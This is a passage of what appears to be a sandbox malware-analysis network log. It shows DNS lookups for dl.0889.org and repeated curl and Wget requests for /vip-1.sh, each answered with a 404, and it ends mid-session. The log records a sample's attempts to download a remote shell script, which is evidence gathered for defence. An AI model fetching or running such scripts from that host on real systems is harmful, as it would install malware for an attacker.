                            Nov 2, 2024 10:13:54.233366013 CET5115280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:54.238826990 CET805115220.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:54.238878012 CET5115280192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:54.367033005 CET5115480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:54.371891975 CET805115420.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:54.371962070 CET5115480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:54.372973919 CET5115480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:54.377841949 CET805115420.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:55.526381016 CET805115420.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:55.526601076 CET5115480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:55.529238939 CET5115480192.168.2.1420.56.16.3
                            Nov 2, 2024 10:13:55.534583092 CET805115420.56.16.3192.168.2.14
                            Nov 2, 2024 10:13:55.534662962 CET5115480192.168.2.1420.56.16.3
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 2, 2024 10:05:52.874811888 CET4719453192.168.2.148.8.8.8
                            Nov 2, 2024 10:05:52.874866962 CET5488753192.168.2.148.8.8.8
                            Nov 2, 2024 10:05:52.881984949 CET53548878.8.8.8192.168.2.14
                            Nov 2, 2024 10:05:52.885535002 CET53471948.8.8.8192.168.2.14
                            Nov 2, 2024 10:05:54.237435102 CET4828153192.168.2.148.8.8.8
                            Nov 2, 2024 10:05:54.245014906 CET53482818.8.8.8192.168.2.14
                            Nov 2, 2024 10:06:52.875929117 CET5726753192.168.2.148.8.8.8
                            Nov 2, 2024 10:06:52.882900000 CET53572678.8.8.8192.168.2.14
                            Nov 2, 2024 10:06:54.245127916 CET3864653192.168.2.148.8.8.8
                            Nov 2, 2024 10:06:54.258908987 CET53386468.8.8.8192.168.2.14
                            Nov 2, 2024 10:07:52.882452965 CET3299153192.168.2.148.8.8.8
                            Nov 2, 2024 10:07:52.889508963 CET53329918.8.8.8192.168.2.14
                            Nov 2, 2024 10:07:54.510996103 CET4216453192.168.2.148.8.8.8
                            Nov 2, 2024 10:07:54.517529964 CET53421648.8.8.8192.168.2.14
                            Nov 2, 2024 10:08:38.230787992 CET5189953192.168.2.148.8.8.8
                            Nov 2, 2024 10:08:38.230835915 CET5385453192.168.2.148.8.8.8
                            Nov 2, 2024 10:08:38.237358093 CET53518998.8.8.8192.168.2.14
                            Nov 2, 2024 10:08:38.237658024 CET53538548.8.8.8192.168.2.14
                            Nov 2, 2024 10:08:52.914923906 CET4482853192.168.2.148.8.8.8
                            Nov 2, 2024 10:08:52.922003031 CET53448288.8.8.8192.168.2.14
                            Nov 2, 2024 10:08:54.226298094 CET4401053192.168.2.148.8.8.8
                            Nov 2, 2024 10:08:54.233048916 CET53440108.8.8.8192.168.2.14
                            Nov 2, 2024 10:09:52.931875944 CET3761053192.168.2.148.8.8.8
                            Nov 2, 2024 10:09:52.938662052 CET53376108.8.8.8192.168.2.14
                            Nov 2, 2024 10:09:54.276756048 CET4969153192.168.2.148.8.8.8
                            Nov 2, 2024 10:09:54.283402920 CET53496918.8.8.8192.168.2.14
                            Nov 2, 2024 10:10:53.021610975 CET5929853192.168.2.148.8.8.8
                            Nov 2, 2024 10:10:53.021831989 CET4329653192.168.2.148.8.8.8
                            Nov 2, 2024 10:10:53.029071093 CET53432968.8.8.8192.168.2.14
                            Nov 2, 2024 10:10:53.033310890 CET53592988.8.8.8192.168.2.14
                            Nov 2, 2024 10:10:54.335309029 CET5771653192.168.2.148.8.8.8
                            Nov 2, 2024 10:10:54.341918945 CET53577168.8.8.8192.168.2.14
                            Nov 2, 2024 10:11:53.042387009 CET3889253192.168.2.148.8.8.8
                            Nov 2, 2024 10:11:53.048871994 CET53388928.8.8.8192.168.2.14
                            Nov 2, 2024 10:11:54.360692978 CET4660653192.168.2.148.8.8.8
                            Nov 2, 2024 10:11:54.367187977 CET53466068.8.8.8192.168.2.14
                            Nov 2, 2024 10:12:53.071383953 CET3455253192.168.2.148.8.8.8
                            Nov 2, 2024 10:12:53.077727079 CET53345528.8.8.8192.168.2.14
                            Nov 2, 2024 10:12:54.379101038 CET5188053192.168.2.148.8.8.8
                            Nov 2, 2024 10:12:54.385799885 CET53518808.8.8.8192.168.2.14
                            Nov 2, 2024 10:13:53.046242952 CET5367753192.168.2.148.8.8.8
                            Nov 2, 2024 10:13:53.052920103 CET53536778.8.8.8192.168.2.14
                            Nov 2, 2024 10:13:54.359813929 CET3363453192.168.2.148.8.8.8
                            Nov 2, 2024 10:13:54.366328001 CET53336348.8.8.8192.168.2.14
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 2, 2024 10:05:52.874811888 CET192.168.2.148.8.8.80x69e8Standard query (0)dl.0889.orgA (IP address)IN (0x0001)false
                            Nov 2, 2024 10:05:52.874866962 CET192.168.2.148.8.8.80xa775Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:05:54.237435102 CET192.168.2.148.8.8.80x1700Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:06:52.875929117 CET192.168.2.148.8.8.80x90e5Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:06:54.245127916 CET192.168.2.148.8.8.80xfa8cStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:07:52.882452965 CET192.168.2.148.8.8.80x68b6Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:07:54.510996103 CET192.168.2.148.8.8.80xbd78Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:08:38.230787992 CET192.168.2.148.8.8.80x8a0dStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                            Nov 2, 2024 10:08:38.230835915 CET192.168.2.148.8.8.80xcd55Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                            Nov 2, 2024 10:08:52.914923906 CET192.168.2.148.8.8.80xa804Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:08:54.226298094 CET192.168.2.148.8.8.80x821dStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:09:52.931875944 CET192.168.2.148.8.8.80x445eStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:09:54.276756048 CET192.168.2.148.8.8.80x703aStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:10:53.021610975 CET192.168.2.148.8.8.80x91d8Standard query (0)dl.0889.orgA (IP address)IN (0x0001)false
                            Nov 2, 2024 10:10:53.021831989 CET192.168.2.148.8.8.80x8e9Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:10:54.335309029 CET192.168.2.148.8.8.80xb03aStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:11:53.042387009 CET192.168.2.148.8.8.80x4da5Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:11:54.360692978 CET192.168.2.148.8.8.80xb79bStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:12:53.071383953 CET192.168.2.148.8.8.80x76a0Standard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:12:54.379101038 CET192.168.2.148.8.8.80x2efStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:13:53.046242952 CET192.168.2.148.8.8.80x9cabStandard query (0)dl.0889.org28IN (0x0001)false
                            Nov 2, 2024 10:13:54.359813929 CET192.168.2.148.8.8.80xe20cStandard query (0)dl.0889.org28IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 2, 2024 10:05:52.885535002 CET8.8.8.8192.168.2.140x69e8No error (0)dl.0889.org20.56.16.3A (IP address)IN (0x0001)false
                            Nov 2, 2024 10:08:38.237358093 CET8.8.8.8192.168.2.140x8a0dNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                            Nov 2, 2024 10:08:38.237358093 CET8.8.8.8192.168.2.140x8a0dNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                            Nov 2, 2024 10:10:53.033310890 CET8.8.8.8192.168.2.140x91d8No error (0)dl.0889.org20.56.16.3A (IP address)IN (0x0001)false
                            • dl.0889.org
                            Session IDSource IPSource PortDestination IPDestination Port
                            0192.168.2.145112020.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:05:52.891045094 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:05:54.051366091 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:05:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1192.168.2.145112220.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:05:54.251400948 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:05:55.403881073 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:05:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            2192.168.2.145112420.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:06:52.888264894 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:06:54.060653925 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:06:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            3192.168.2.145112620.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:06:54.270478010 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:06:55.460819006 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:06:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            4192.168.2.145112820.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:07:52.894989014 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:07:54.372159004 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Nov 2, 2024 10:07:54.372252941 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            5192.168.2.145113020.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:07:54.523950100 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:07:55.969543934 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Nov 2, 2024 10:07:55.970973015 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            6192.168.2.145113220.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:08:52.927510977 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:08:54.102874041 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:08:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            7192.168.2.145113420.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:08:54.239042044 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:08:55.400192976 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:08:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            8192.168.2.145113620.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:09:52.974863052 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:09:54.112191916 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:09:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            9192.168.2.145113820.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:09:54.289859056 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:09:55.462785959 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:09:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            10192.168.2.145114020.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:10:53.039072990 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:10:54.200016975 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:10:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            11192.168.2.145114220.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:10:54.348264933 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:10:55.524571896 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:10:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            12192.168.2.145114420.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:11:53.054505110 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:11:54.212130070 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:11:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            13192.168.2.145114620.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:11:54.373389959 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:11:55.517473936 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:11:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
